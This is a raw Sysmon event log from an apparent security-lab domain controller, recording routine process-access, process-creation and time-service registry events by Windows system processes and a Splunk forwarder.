13:44:19.945{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:19.945{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4AB3-6000-A005-000000009A01}6556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:19.945{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AB3-6000-A005-000000009A01}6556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:19.945{08A6967A-4AB3-6000-A005-000000009A01}6556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000014458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:44:28.867{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea7b-0x61525e5a) 10341000x800000000000000014485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:44.461{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000014495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:44:54.602{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000014494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:44:54.602{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00208ef6) 13241300x800000000000000014493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:44:54.602{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ea73-0x0ea46951) 